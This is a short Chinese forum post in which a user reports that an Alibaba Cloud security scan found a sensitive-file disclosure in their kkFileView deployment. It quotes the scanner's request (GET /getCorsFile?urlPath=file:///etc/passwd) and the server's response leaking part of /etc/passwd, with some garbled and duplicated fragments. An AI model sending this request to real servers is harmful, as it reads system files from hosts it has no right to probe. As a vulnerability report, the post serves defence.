ToB企服应用市场:ToB评测及商务社交产业平台
标题:
kkfileview阿里云安全扫描:威胁范例敏感信息回显 (Sensitive Information
[打印本页]
作者:
伤心客
时间:
2024-9-26 19:54
标题:
kkfileview阿里云安全扫描:威胁范例敏感信息回显 (Sensitive Information
在阿里云部署的kkfileview,阿里云安全性扫描有漏洞
网络流量内容GET /getCorsFile?urlPath=file:///etc/passwd HTTP/1.1
Host: XXX.XXX.XXXX.XXX:80XX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.6.2333.33 Safari/537.36 AliyunTaiShiGanZhi https://www.aliyun.com/product/sas
Accept-Encoding: gzip, deflate
Accept:
/
Connection: keep-alive
Accept-Language: zh-CN,zh;q=0.8
网络流量内容HTTP/1.1 200 OK
Date: Wed, 29 Mar 2023 19:45:23 GMT
Content-Length: 1044
root❌0:0:root:/root:/bin/bash bin❌1:1:bin:/bin:/sbin/nologin daemon❌2:2:daemon:/sbin:/sbin/nologin adm❌3:4:adm:/var/adm:/sbin/nologin lp❌4:7:lp:/var/spool/lpd:/sbin/nologin sync❌5:0:sync:/sbin:/bin/sync shutdown❌6:0:shutdown:/sbin:/sbin/shutdown halt❌7:0:halt:/sbin:/sbin/halt mail❌8:12:mail:/var/spool/mail:/sbin/nologin operator❌11:0
perator:/root:/sbin/nologin games❌12
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)
Powered by Discuz! X3.4
perator:/root:/sbin/nologin games❌12